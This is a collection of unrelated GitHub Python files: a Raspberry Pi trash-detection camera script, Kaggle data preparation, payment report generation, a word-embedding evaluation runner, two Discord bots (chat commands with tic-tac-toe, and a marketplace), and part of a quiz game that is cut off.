{"seq_id":"29719247754","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jul 1 09:06:06 2018\r\n\r\n@author: Ian\r\n\"\"\"\r\nimport requests\r\nimport cv2\r\nimport numpy as np\r\nimport json\r\n\r\n\r\ndef triggered(message):\r\n    url = 'https://bosch-ville-api.unificationengine.com/v1/message/send'\r\n    api_token = 'Y2gmZGV2aWNlX3R5cGU9WERJ'\r\n    headers = {'Content-Type': 'application/json', 'Authorization': api_token}\r\n    body = {\"phone_number\": \"+6598287932\",\"message\": message}\r\n    r = requests.post(url, data=json.dumps(body), headers=headers)\r\n\r\n\r\n# This is the cascade we just made; name the XML file whatever you like.\r\n
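# (Illustrative note, not from the original author: the positional arguments to\r\n# detectMultiScale below are scaleFactor and minNeighbors; values such as 1.3\r\n# and 5 are more typical starting points than 20, 20.)\r\n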
trash_cascade = cv2.CascadeClassifier('cascade.xml')\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n\r\n    ret, img = cap.read()\r\n\r\n    if not ret:\r\n        # Skip this iteration instead of using an undefined gray frame\r\n        print(\"ret is False\")\r\n        continue\r\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n    trash = trash_cascade.detectMultiScale(gray, 20, 20)\r\n\r\n    for (x, y, w, h) in trash:\r\n        cv2.rectangle(img, (x, y), (x+w, y+h), (255, 255, 0), 2)\r\n        font = cv2.FONT_HERSHEY_SIMPLEX\r\n        # Anchor the label just above the box; the original (w-x, y-h) pointed off-target\r\n        cv2.putText(img, 'Trash', (x, y - 10), font, 0.5, (255, 255, 0), 2, cv2.LINE_AA)\r\n\r\n        # NOTE: this fires for every detection in every frame\r\n        triggered(\"Trash build up is too much. Help service hotline activated!\")\r\n\r\n    cv2.imshow('gray', gray)\r\n    k = cv2.waitKey(30) & 0xff\r\n    if k == 27:\r\n        break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"ianlimle/IoT-Home-Care-System","sub_path":"Rpi_control_cam.py","file_name":"Rpi_control_cam.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"36725368952","text":"import pandas as pd\nimport numpy as np\nimport string\nimport os\nimport json\nimport gc\nfrom sklearn.preprocessing import LabelEncoder\ngc.enable()\n\ndataPath='../../../data/avito-demand-prediction'\n\nUSE_HDF5_COMPRESSION_ARG = {\n    'format': 'table', \n    'complib': 'blosc:zstd', \n    'complevel': 9\n}\n\n# Remove any existing hdf5 storage file since it does not support clean overwrite\nfor f in os.listdir(f'{dataPath}'): \n    if '.h5' in f and 'active' not in f:\n        os.remove(f'{dataPath}/{f}')\n        print(f'{dataPath}/{f} removed')\n\nbasicDataStore = pd.HDFStore(f'{dataPath}/basicData.h5', **USE_HDF5_COMPRESSION_ARG)\ntextDataStore = pd.HDFStore(f'{dataPath}/textData.h5', **USE_HDF5_COMPRESSION_ARG)\nimageDataStore = pd.HDFStore(f'{dataPath}/imageData.h5', **USE_HDF5_COMPRESSION_ARG)\n\n## Load csv.zip data\ntrain = pd.read_csv(os.path.join(dataPath, 'train.csv.zip'), compression='zip')\nprint('train.csv loaded')\ntest = pd.read_csv(os.path.join(dataPath, 'test.csv.zip'), compression='zip')\nprint('test.csv loaded')\n\n## Apply label encoding\nmapping_folder = 'Label_encoding_basic'\nif not os.path.exists(mapping_folder):\n    os.mkdir(mapping_folder)\n\ndef compressMainTable(df):\n    for col in df:\n        if df[col].dtype=='object' and df[col].nunique() < 3000 and col != 'activation_date':\n            print(f'encoding {col}...')\n            le = LabelEncoder()\n            le.fit(df[col].astype(str))\n            le_mapping = dict(zip(le.classes_, map(int, le.transform(le.classes_))))\n\n            with open(os.path.join(mapping_folder, col+'.json'), 'w') as f:\n                json.dump(le_mapping, f, indent=4, ensure_ascii=False)\n\n            df[col] = le.fit_transform(df[col].astype(str)).astype(np.int16)\n\n    df.price = df.price.fillna(-1).astype(np.int64)\n    df.item_seq_number = df.item_seq_number.astype(np.int32)\n    df.activation_date = pd.to_datetime(df.activation_date)\n    return df\n\ntmpCat = pd.concat([train,test], sort=False)\ntmpCat = compressMainTable(tmpCat)\ntrain = tmpCat.iloc[:train.shape[0],:]\ntest = tmpCat.iloc[train.shape[0]:,]\ntarget = train.deal_probability\ntrain.drop('deal_probability', axis=1, inplace=True)\ntest.drop('deal_probability', axis=1, inplace=True)\n\n## Separate and drop advanced features into a different data file\ntextFeatures = ['title', 'description']\nimageFeatures = ['image', 'image_top_1']\n\ntextDataStore['trainRaw'] = train[['item_id', 'user_id'] + textFeatures]\nimageDataStore['trainRaw'] = train[['item_id', 'user_id'] + imageFeatures]\ntextDataStore['testRaw'] = test[['item_id', 'user_id'] + 
textFeatures]\nimageDataStore['testRaw'] = test[['item_id', 'user_id'] + imageFeatures]\n\ntrain.drop(textFeatures+imageFeatures, axis=1, inplace=True)\ntest.drop(textFeatures+imageFeatures, axis=1, inplace=True)\n\nbasicDataStore['trainRaw'] = train\nbasicDataStore['testRaw'] = test\nbasicDataStore['trainTarget'] = target\n\n# Close HDF5\nbasicDataStore.close()\ntextDataStore.close()\nimageDataStore.close()\n\n# Clean up\ndel tmpCat\ngc.collect();\n","repo_name":"LowPass-DataScience/avito-demand-prediction-chanllege","sub_path":"avito-demand-prediction-challenge/python_codes/prepare_HDF5.py","file_name":"prepare_HDF5.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1207426613","text":"import os\nfrom model import *\nimport pandas as pd\nfrom peewee import fn\nfrom datetime import datetime\nfrom database import DatabaseConnections\n\ndb = DatabaseConnections()\nengine = db.sqlalchemy_connection()\n\nyear, month, day = str(datetime.today().date()).split('-')\nmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun','Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\nclass Reports:\n\n def __init__(self, institution, retailer, path):\n self.institution = institution\n self.retailer = retailer\n self.today = datetime.now().strftime(\"%y%m%d\") # today's date format YYMMDD\n self.path = path # './CompensationReports/RetailerReports/'\n\n def csvReport(self, table_name, report_name):\n try:\n cols = table_name._meta.sorted_field_names\n data = table_name.select().dicts()\n data_frame = pd.DataFrame(data, columns=cols)\n file_name = \"{}_{}.csv\".format(report_name, self.today)\n data_frame.to_csv(self.path + file_name, index=False)\n print(\"{} Generated at {} \".format(report_name ,datetime.now().strftime(r'%d-%m-%Y %H:%M:%S')))\n except table_name.DoesNotExist:print('Error In Generating Report Of {}'.format(report_name))\n except Exception as e:print('Error In Generating Report Of {} - {}'.format(report_name, str(e)))\n\n\n\n def all_transactions_report(self):\n query = '''SELECT distinct(newiseretailer.CardAcceptorIdentification) FROM newiseretailer INNER JOIN retailercompansation\n ON retailercompansation.RetailerId = newiseretailer.CardAcceptorIdentification And retailercompansation.Channel = newiseretailer.ChannelType and retailercompansation.EntityId = newiseretailer.AcquiringInstitutionIdentification where (newiseretailer.ResponseCode = '00') and (retailercompansation.PendingDays = '0');'''\n cursor = myDB.execute_sql(query)\n\n data=[k for k in cursor]\n result = [k for k in data]\n retailer_list = [item for sublist in result for item in sublist]\n try:\n query = NewISERetailer.select(\n NewISERetailer.AcquiringInstitutionIdentification,NewISERetailer.CardAcceptorIdentification,\n NewISERetailer.CardAcceptorTerminalIdentification,NewISERetailer.MerchantTypeCode,NewISERetailer.MessageType,\n NewISERetailer.ResponseCode,NewISERetailer.ProcessingCode,NewISERetailer.LocalTransactionTime,\n NewISERetailer.LocalTransactionDate,NewISERetailer.SettlementDate,NewISERetailer.Track2Data,\n NewISERetailer.SystemsTraceAuditNumber,NewISERetailer.RetrievalReferenceNumber,NewISERetailer.CardAcceptorNameLocation,\n NewISERetailer.ChannelType,NewISERetailer.CardType,NewISERetailer.TransactionAmount,NewISERetailer.RetCardTypeCommision,\n NewISERetailer.RetMccCommision,NewISERetailer.RetBinCommision,NewISERetailer.RetTxnIdentifierCommision,\n 
NewISERetailer.Retailer,NewISERetailer.Acquirer,NewISERetailer.Issuer,NewISERetailer.TotalCommissions,\n NewISERetailer.Retefuente,NewISERetailer.Reteica,NewISERetailer.Cree,NewISERetailer.Reteiva,NewISERetailer.TotalTaxes,\n NewISERetailer.TotalDiscounts,NewISERetailer.FinalAmount\n ).where((NewISERetailer.ResponseCode == '00') & NewISERetailer.CardAcceptorIdentification.in_(tuple(retailer_list))).dicts()\n\n data_frame = pd.DataFrame(query, columns=['AcquiringInstitutionIdentification', 'CardAcceptorIdentification', 'CardAcceptorTerminalIdentification',\n 'MerchantTypeCode', 'MessageType', 'ResponseCode', 'ProcessingCode', 'LocalTransactionTime',\n 'LocalTransactionDate', 'SettlementDate', 'Track2Data', 'SystemsTraceAuditNumber', 'RetrievalReferenceNumber',\n 'CardAcceptorNameLocation', 'ChannelType', 'CardType', 'TransactionAmount', 'RetCardTypeCommision',\n 'RetMccCommision', 'RetBinCommision', 'RetTxnIdentifierCommision', 'Retailer', 'Acquirer', 'Issuer',\n 'TotalCommissions', 'Retefuente', 'Reteica', 'Cree', 'Reteiva', 'TotalTaxes', 'TotalDiscounts', 'FinalAmount'])\n\n for x, y in data_frame.groupby('AcquiringInstitutionIdentification'):\n for k, v in y.groupby('ChannelType'):\n file_name = \"{}_{}_TGR_Retailer_{}.csv\".format(x, k, self.today)\n v.to_csv(self.path + file_name, index=False)\n\n print(\"All Transactions Report With Liquidation Generated at {} \".format(datetime.now().strftime(r'%d-%m-%Y %H:%M:%S')))\n except NewISERetailer.DoesNotExist:print('Error In Generating Report Of All Transactions With Liquidation')\n\n except Exception as e:print('Error In Generating Report Of All Transactions With Liquidation - {}'.format(str(e)))\n\n\n def Compsation_table_backup(self):\n\n FNAME = f'Daily_Bk_{\"retailercompansation\"}_{year}{month}{day}.csv'\n REPORTS_PATH = f'CompensationReports/RetailerCompansationBackup/'\n\n dataFrame = pd.read_sql_table(\"retailercompansation\", con=engine).astype('str')\n dataFrame.to_csv(REPORTS_PATH+FNAME)\n\nif __name__ == '__main__':\n pass","repo_name":"AnkitaOmni/gh-first-action","sub_path":"reports_cc42.py","file_name":"reports_cc42.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19535295069","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport pandas as pd\n\n\n# In[5]:\n\n\nresults = dict()\noutput = dict()\ntasks = os.listdir('./tasks')\nword_embeddings = os.listdir('./word_vec')\ntasks.remove('.DS_Store')\n\nfor i in word_embeddings:\n print('evaluating', i)\n results = dict()\n for j in tasks:\n results[j] = os.popen('python3 evaluate_wordSim.py ./word_vec/{} ./tasks/{}'.format(i, j)).read().replace('\\n', '')\n print(results)\n output[i] = results\n\n\n# In[6]:\n\n\npd.DataFrame(output).T.to_csv('intrinsic_results.csv')\n\n","repo_name":"Institute-for-Artificial-Intelligence/Sparse-Interpretable-Word-Embeddings-For-Medical-Domain","sub_path":"eval/intrinsic/intrinsic_eva.py","file_name":"intrinsic_eva.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31884770447","text":"import discord\nimport time\nimport random\nimport os\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport configparser\n\n# Config environment\nconfig = configparser.ConfigParser()\nconfig.read('conf.ini')\n\n# Variables Tateti\ntablero = [[\"0\", \"1\", \"2\"], [\"3\", \"4\", \"5\"], [\"6\", \"7\", \"8\"]]\njug = [\"\", 
\"\"]\r\ntateti_iniciar = False\r\nturno_jug = 0\r\n\r\n# Discord client\r\nclient = discord.Client()\r\n\r\n# -----------Events-----------\r\n@client.event\r\nasync def on_message(message):\r\n    # Global variables\r\n    global tablero\r\n    global tateti_iniciar\r\n    global jug\r\n    global turno_jug\r\n\r\n    # Random answers\r\n    respuesta = [\"Si\",\r\n                 \"No\",\r\n                 \"Tal vez\",\r\n                 \"Nunca\",\r\n                 \"Seguramente\",\r\n                 \"Nah\",\r\n                 \"100% Seguro\"]\r\n\r\n    # Random phrases\r\n    frases = [\"Sos pelotudo\",\r\n              \"Hola\",\r\n              \"Aguante River\"]\r\n\r\n    # Ignore messages sent by the bot itself\r\n    if(message.author == client.user):\r\n        return\r\n\r\n    # !hola command\r\n    if message.content == '!hola':\r\n        msg = 'Buenos dias, {0.author.mention}'.format(message)\r\n        await message.channel.send(msg)\r\n\r\n    # !hora command\r\n    if message.content == '!hora':\r\n        msg = 'La hora es '+time.strftime(\"%H:%M:%S\")\r\n        await message.channel.send(msg)\r\n\r\n    # !fecha command\r\n    if message.content == '!fecha':\r\n        msg = 'La fecha es '+time.strftime(\"%d/%m/%y\")\r\n        await message.channel.send(msg)\r\n\r\n    # !roll command\r\n    if message.content == '!roll':\r\n        num = str(random.randrange(100))\r\n        msg = (\r\n            \"El usuario {0.author.mention} saco el numero: \" + num).format(message)\r\n        await message.channel.send(msg)\r\n\r\n    # !purgar_chat command\r\n    if message.content == '!purgar_chat':\r\n        msg = \"Purgando todo el chat en 5 segundos \\n\"\r\n        await message.channel.send(msg)\r\n        # (time.sleep blocks the event loop; asyncio.sleep would be the async-safe choice)\r\n        time.sleep(5)\r\n        await message.channel.purge()\r\n\r\n    # !borrame_esto command: deletes the invoking message, as the help text promises\r\n    if message.content == \"!borrame_esto\":\r\n        await message.delete()\r\n\r\n    # !help command\r\n    if message.content == '!help' or message.content == \"!\":\r\n        msg = \"Commandos de Neo Bot: \\n\"\r\n        msg += \"!hola --> Saludo \\n\"\r\n        msg += \"!hora --> Hora del sistema \\n\"\r\n        msg += \"!fecha --> Fecha del sistema \\n\"\r\n        msg += \"!roll --> Tira los dados \\n\"\r\n        msg += \"!help --> Ayuda del Bot \\n\"\r\n        msg += \"!pregunta --> Preguntale algo al Bot \\n\"\r\n        msg += \"!random --> El bot tira una frase random \\n\"\r\n        msg += \"!ping --> Podes consultar el lag que tenes \\n\"\r\n        msg += \"!purgar_chat --> (solo dev) Borra los ultimos mensajes del canal de chat donde se lanzo el comando\\n\"\r\n        msg += \"!borrame_esto --> (solo dev) Borra el ultimo mensaje del canal donde se lanzo el comando\\n\"\r\n        msg += \"!imagen --> Busca una imagen dado una palabra o frase en google, la imagen no tiene un tamaño considerable\\n\"\r\n        msg += \"!iniciar_tateti --> Inicia una partida de tateti\\n\"\r\n        msg += \"!tateti --> Juega la posicion indicada en el tateti\\n\"\r\n        msg += \"!hablar --> (solo dev) El bot dice algo\\n\"\r\n        await message.channel.send(msg)\r\n\r\n    # !ping command\r\n    if message.content == \"!ping\":\r\n        msg = round(client.latency * 1000)\r\n        await message.channel.send(\"Ping : \" + str(msg))\r\n\r\n    # \"!usuarios\" command\r\n    if message.content == \"!usuarios\":\r\n        for u in message.guild.members:\r\n            print(u.status)\r\n\r\n    # !random command\r\n    if message.content == \"!random\":\r\n        await message.channel.send(random.choice(frases))\r\n\r\n    # !pregunta command\r\n    if message.content.startswith(\"!pregunta\"):\r\n        preg = re.compile(r\"(!pregunta)\").sub(\"\", message.content,)\r\n        await message.channel.send(preg+\"? \" + random.choice(respuesta))\r\n\r\n    # Happy birthday\r\n    if 'happy birthday' in message.content.lower() or 'feliz cumpleaños' in message.content.lower():\r\n        await message.channel.send('Feliz cumpleaños!! 🎈🎉')\r\n\r\n
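    # (Hypothetical variant, illustration only: weighted answers for !pregunta could use\r\n    # random.choices(respuesta, weights=[2, 2, 1, 1, 1, 1, 1])[0] instead of random.choice.)\r\n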
    # Image search: !imagen\r\n    if message.content.startswith(\"!imagen\"):\r\n        image_list = []\r\n        palabra_imagen = re.compile(r\"(!imagen)\").sub(\"\", message.content,)\r\n        url_google = \"https://www.google.com/search?q=\" + \\\r\n            palabra_imagen + \"&source=lnms&tbm=isch\"\r\n        print(\"Link de la busqueda:\" + url_google)\r\n        res = requests.get(url_google).content\r\n        soup = BeautifulSoup(res, 'html.parser')\r\n        for link in soup.find_all(\"img\"):\r\n            image_list.append(link.get(\"src\"))\r\n        image_list = list(filter(None, image_list))\r\n        image_list = list(filter(lambda a: \"http\" in a, image_list))\r\n        e = discord.Embed()\r\n        e.set_image(\r\n            url=image_list[random.randrange(1 + (len(image_list) - 1))])\r\n        await message.channel.send(embed=e)\r\n\r\n    # The bot speaks: !hablar\r\n    if message.content.startswith(\"!habla\"):\r\n        # Strip the \"!habla\"/\"!hablar\" prefix in a single pass\r\n        mensaje_habla = re.sub(r\"^!hablar?\\s*\", \"\", message.content)\r\n        await message.channel.send(mensaje_habla)\r\n\r\n    # Tic-tac-toe: !iniciar_tateti\r\n    if message.content.startswith(\"!iniciar_tateti\"):\r\n        if tateti_iniciar:\r\n            msg = \"Ya hay una partida iniciada\"\r\n        else:\r\n            rival = \"\"\r\n            if len([x.id for x in message.mentions]) == 1:\r\n                for u in [x.id for x in message.mentions]:\r\n                    rival = u\r\n                jug[0] = message.author.id\r\n                jug[1] = rival\r\n            if len([x.id for x in message.mentions]) > 1:\r\n                msg = \"Solo se puede retar a un usuario\"\r\n            elif len([x.id for x in message.mentions]) == 0:\r\n                msg = \"No se nombro a ningun usuario para la partida\"\r\n            elif rival not in [x.id for x in message.mentions]:\r\n                msg = \"El rival no se encuentra en la lista de usuarios\"\r\n            elif rival == message.author.id:\r\n                msg = \"El rival no puede ser el mismo usuario\"\r\n            else:\r\n                tateti_iniciar = True\r\n                msg = \"Se inicia una partida de tateti entre <@\" + str(message.author.id) + \"> y <@\" + str(rival) + \">\\n\"\r\n                username1 = client.get_user(jug[0])\r\n                username2 = client.get_user(jug[1])\r\n                turno_jug = random.randrange(0,2)\r\n                msg += \"Turno de <@\" + str(jug[turno_jug]) + \"> \"\r\n        await message.channel.send(msg)\r\n\r\n    if message.content.startswith(\"!tateti\") and tateti_iniciar:\r\n        if jug[turno_jug] == message.author.id:\r\n            pos = re.compile(r\"(!tateti)\").sub(\"\", message.content,)\r\n            if tablero[(int(pos) // 3)][(int(pos) % 3)] == \"X\" or tablero[(int(pos) // 3)][(int(pos) % 3)] == \"O\":\r\n                msg = \"La posicion ya esta ocupada por \" + tablero[(int(pos) // 3)][(int(pos) % 3)]\r\n            else:\r\n                if turno_jug == 0:\r\n                    tablero[(int(pos) // 3)][(int(pos) % 3)] = \"X\"\r\n                    turno_jug = 1\r\n                else:\r\n                    tablero[(int(pos) // 3)][(int(pos) % 3)] = \"O\"\r\n                    turno_jug = 0\r\n                msg = tablero[0][0] + \" | \" + tablero[0][1] + \" | \" + tablero[0][2] + \"\\n\" \\\r\n                    + \"----------\\n\" \\\r\n                    + tablero[1][0] + \" | \" + tablero[1][1] + \" | \" + tablero[1][2] + \"\\n\" \\\r\n                    + \"----------\\n\" \\\r\n                    + tablero[2][0] + \" | \" + tablero[2][1] + \" | \" + tablero[2][2]\r\n                # Check the three rows, three columns and both diagonals\r\n                # (the middle-column test originally compared tablero[1][2] instead of tablero[2][1])\r\n                if tablero[0][0] == tablero[0][1] and tablero[0][0] == tablero[0][2] or \\\r\n                        tablero[1][0] == tablero[1][1] and tablero[1][0] == tablero[1][2] or \\\r\n                        tablero[2][0] == tablero[2][1] and tablero[2][0] == tablero[2][2] or \\\r\n                        tablero[0][0] == tablero[1][0] and tablero[0][0] == tablero[2][0] or \\\r\n                        tablero[0][1] == tablero[1][1] and tablero[0][1] == tablero[2][1] or \\\r\n                        tablero[0][2] == tablero[1][2] and tablero[0][2] == tablero[2][2] or \\\r\n                        tablero[0][0] == tablero[1][1] and tablero[0][0] == tablero[2][2] or \\\r\n                        tablero[2][0] == tablero[1][1] and tablero[2][0] == tablero[0][2]:\r\n                    msg += \"\\n El ganador fue <@\" + str(message.author.id) + \"> , se limpiara el tablero\"\r\n
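                    # (Hypothetical refactor, for illustration only: a small helper such as\r\n                    # reset_board = lambda: [[str(r*3 + c) for c in range(3)] for r in range(3)]\r\n                    # would avoid repeating the board literal at the two reset sites below.)\r\n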
                    # Reset the board to its initial state\r\n                    tablero = [[\"0\", \"1\", \"2\"], [\"3\", \"4\", \"5\"], [\"6\", \"7\", \"8\"]]\r\n                    tateti_iniciar = False\r\n                else:\r\n                    cant = 0\r\n                    for i in range(0,3):\r\n                        for j in range(0,3):\r\n                            if tablero[i][j] == \"X\" or tablero[i][j] == \"O\":\r\n                                cant += 1\r\n                    if cant == 9:\r\n                        msg += \"\\n El juego termino en empate\"\r\n                        # Reset the board to its initial state\r\n                        tablero = [[\"0\", \"1\", \"2\"], [\"3\", \"4\", \"5\"], [\"6\", \"7\", \"8\"]]\r\n                        tateti_iniciar = False\r\n                    else:\r\n                        msg += \"\\n Sigue el jugador <@\" + str(jug[turno_jug]) + \">\"\r\n        else:\r\n            msg = \"No es el turno del jugador <@\" + str(message.author.id) + \">\"\r\n        await message.channel.send(msg)\r\n    elif message.content.startswith(\"!tateti\") and not tateti_iniciar:\r\n        msg = \"Aun no se ha iniciado una partida de tateti, iniciala con !iniciar_tateti\"\r\n        await message.channel.send(msg)\r\n\r\n\r\n@client.event\r\nasync def on_message_delete(message):\r\n    await message.channel.send(\"Un mensaje ha sido borrado\")\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n    print(\"Neo-Bot preparado\")\r\n    print(\"Iniciado como {0.user}\".format(client))\r\n\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n    # Send a private welcome message\r\n    await member.create_dm()\r\n    await member.dm_channel.send(f'Hola {member.name}, bienvenido a mi servidor de Discord!')\r\n# -----------Events-----------\r\n\r\n# Main\r\n\r\nclient.run(config['TOKEN']['secret_token'])\r\n","repo_name":"SantiMenendez19/neo_bot_discord","sub_path":"neo_bot.py","file_name":"neo_bot.py","file_ext":"py","file_size_in_byte":10103,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"8172842774","text":"#Title: Hello World - cuhackit 10/17/2020\r\n#Authors: Team 15 (Plethora of Maniacs): Nathan, Darin, Alex, John\r\n#Project: MarketBot\r\n#Version: Beta 1.0\r\n\r\n#TO-DO: Add ability to add descriptions\r\n#TO-DO: Limit submissions/day on MarketBot; maybe add pictures eventually\r\n\r\n\r\n#import libraries: including discord API\r\nimport json\r\nimport discord\r\nfrom discord.ext import commands\r\nimport random\r\n\r\n#market description:\r\ndescription = \"A marketplace bot for Clemson\" \r\n#Set default bot intents\r\nintents = discord.Intents.default() \r\n\r\n#bot prefix: user enters '$' to enter in commands for marketBot\r\nbot = commands.Bot(command_prefix='$', description=description, intents=intents)\r\n\r\n#function: opens .json file for the marketBot to read from\r\ndef readListings():\r\n    with open('listings.json', 'r') as f:\r\n        return json.loads(f.read())\r\n\r\n#function: writes the user listing to the .json file\r\ndef writeListings(x):\r\n    with open('listings.json', 'w') as f:\r\n        f.write(json.dumps(x))\r\n\r\n#event: When the bot loads up, execute the following\r\n@bot.event\r\nasync def on_ready():\r\n    print('Logged in as')\r\n    print(bot.user.name)\r\n    print(bot.user.id)\r\n    print('------')\r\n\r\n    #Changes the bot's status when it is not in use. 
Also displays the Game state\r\n await bot.change_presence(status=discord.Status.online, activity=discord.Game('Use $market for help'))\r\n\r\n#$market command: Removes listings from the .json file\r\n@bot.command()\r\nasync def remove(ctx, num:int):\r\n listings = readListings()\r\n if num <= 0:\r\n await ctx.send(\"**ERROR:** Item number cannot be less than or equal to 0.\")\r\n return\r\n if listings[0][\"numberOfListings\"] < num:\r\n await ctx.send(\"**ERROR:** Item not recognized!\")\r\n return\r\n if (listings[num]['userid'] == ctx.author.id):\r\n listings.pop(num)\r\n listings[0][\"numberOfListings\"] = int(listings[0][\"numberOfListings\"]) - 1\r\n writeListings(listings)\r\n await ctx.send('Item has been removed!')\r\n else:\r\n await ctx.send('**ERROR:** You are not the user who made this listing.')\r\n\r\n#$market command: Prints the list of commands the user can input\r\n@bot.command()\r\nasync def market(ctx):\r\n output = \"\"\"```$sell ``` - Spaces split up the parameters, use underscores in the item name or contact if needed.\r\n\r\n ```$remove ``` - Remove one of your listings from the public list.\r\n\r\n ```$view ``` - View more information on an item. \r\n\r\n ```$viewAll``` - Lists all items that are currently being sold. \"\"\"\r\n embed = discord.Embed(title='List of Commands: :coin:',\r\n description=output, colour = discord.Colour.blue())\r\n embed.set_image(url='https://cdn.discordapp.com/avatars/767044968878440479/0ef76e39c69d1815a32d1697d7df070b.png')\r\n await ctx.send(embed=embed)\r\n\r\n#$market command: Lets user list their items to $market/.json file\r\n# $sell item_Name price contact\r\n@bot.command()\r\nasync def sell(ctx, item:str, price:str, contact:str):\r\n invalidChars = [\"*\", \"<\", \">\", \",\", \"\\\\\", \"!\"]\r\n for invalid in invalidChars:\r\n if invalid in item or invalid in price or invalid in contact:\r\n await ctx.send(\"**ERROR:** Please do not enter symbols.\")\r\n return\r\n listings = readListings()\r\n\r\n listings.append({ \"Listing\":item, \"Price\":price, \"Contact\":contact, \"userid\":ctx.author.id})\r\n listings[0][\"numberOfListings\"] = int(listings[0][\"numberOfListings\"]) + 1\r\n author = ctx.author\r\n \r\n #Wait on response from user to enter description\r\n def check(m):\r\n return m.author == author\r\n await ctx.send(\"Awesome! Please enter a brief description of your item.\")\r\n msg = await bot.wait_for('message', check=check)\r\n \r\n numOfListings = int(listings[0][\"numberOfListings\"])\r\n listings[numOfListings]['Description'] = msg.content\r\n\r\n writeListings(listings)\r\n embed = showListing(int(listings[0][\"numberOfListings\"]))\r\n await ctx.send(\"Listing added!\")\r\n await ctx.send(embed=embed)\r\n\r\n#function: returns the embed information\r\ndef showListing(num):\r\n listings = readListings()\r\n output = \"\"\r\n for key in listings[num]:\r\n if key != \"userid\":\r\n output += \"**\" + key + \"**: \" + str(listings[num][key]) + \"\\n\"\r\n embed = discord.Embed(title='Viewing Item #'+str(num)+' :eyes:',\r\n description=output, colour = discord.Colour.blue())\r\n return embed\r\n\r\n#function: print error message for user whenever invalid argument is passed\r\n@bot.event\r\nasync def on_command_error(ctx, error):\r\n if isinstance(error, commands.errors.BadArgument):\r\n await ctx.send(\"ERROR: Invalid argument. 
Please run **$market** for information on how to use MarketBot's commands.\")\r\n\r\n#Views the listing the user specifies\r\n@bot.command()\r\nasync def view(ctx, num:int):\r\n if num == 69420 or num == 42069:\r\n await ctx.send(\"haha funny number lol\")\r\n return\r\n if num <= 0:\r\n await ctx.send(\"**ERROR:** Item number cannot be less than or equal to 0.\")\r\n return\r\n embed = showListing(num)\r\n await ctx.send(embed=embed)\r\n\r\n#Prints all listings in the listings.json file and displays their listing & price\r\n@bot.command()\r\nasync def viewAll(ctx):\r\n listings = readListings() #Read file as string and parse as json\r\n numOfListings = listings[0][\"numberOfListings\"]\r\n output = \"\"\r\n for i in range(1,int(numOfListings)+1): #for loop: displays the listing + price for user\r\n listing = listings[i][\"Listing\"] \r\n price = listings[i][\"Price\"]\r\n output += str(i) + \") **\" + listing + \"**: \" + price + \"\\n\\n\"\r\n embed = discord.Embed(title='All Current Listings :fire:',\r\n description=output, colour = discord.Colour.blue())\r\n await ctx.send(embed=embed)\r\n\r\n#Unique bot token.\r\nbot.run('token')","repo_name":"OxxoCodes/MarketBot","sub_path":"marketbot.py","file_name":"marketbot.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5154052144","text":"import random #14/10 23.14\n\nclass Player:\n def __init__(self, name, total=0, played=False):\n self.name = name\n self.total = total\n self.played = played\n\nclass Question:\n def __init__(self, question, correct):\n self.question = question\n self.correct = correct\n\nclass Game:\n def begin(self, playerA, playerB):\n global totalGames\n while True:\n if totalGames == 2:\n print(\"GAME OVER!\")\n break\n if totalGames == 1 and playerA.played == 4:\n break\n if totalGames == 1 and playerB.played == 4:\n break\n if playerA.played == True:\n self.highOrLow(playerB)\n if playerB.played == True:\n self.highOrLow(playerA)\n\n def test(self,playerA, playerB):\n global testStatus\n while testStatus == True:\n global totalGames\n print(totalGames)\n if totalGames == 2:\n break\n qChoice = random.randint(1,len(qList))\n print(qList[qChoice-1].question)\n AAnswer = int(input(\"{}, please enter your estimation\".format(playerA.name)))\n BAnswer = int(input(\"{}, please enter your estimation\".format(playerB.name)))\n if qList[qChoice-1].correct > AAnswer:\n Adifference = qList[qChoice-1].correct - AAnswer\n elif qList[qChoice-1].correct < AAnswer:\n Adifference = AAnswer - qList[qChoice-1].correct\n else:\n Adifference = 0\n if qList[qChoice-1].correct > BAnswer:\n Bdifference = qList[qChoice-1].correct - BAnswer\n elif qList[qChoice-1].correct < BAnswer:\n Bdifference = BAnswer - qList[qChoice-1].correct\n else:\n Bdifference = 0\n print(qList[qChoice-1].correct)\n print(playerA.name,\" was \",Adifference,\" away!\")\n print(playerB.name,\" was \",Bdifference,\" away!\")\n if Adifference < Bdifference:\n print(playerA.name, \" wins!\")\n testStatus = False\n self.highOrLow(player1)\n elif Adifference > Bdifference:\n print(playerB.name, \" wins!\")\n testStatus = False\n self.highOrLow(player2)\n else:\n del qList[qChoice-1]\n \n def highOrLow(self, person):\n while cardSets != []:\n global totalGames\n totalGames += 1\n cards = cardSets.pop()\n print(\"The first card is \",cards[0])\n print(\"Welcome\", person.name)\n for j in range(1,length):\n print(\"\")\n print(\"Higher or lower? 
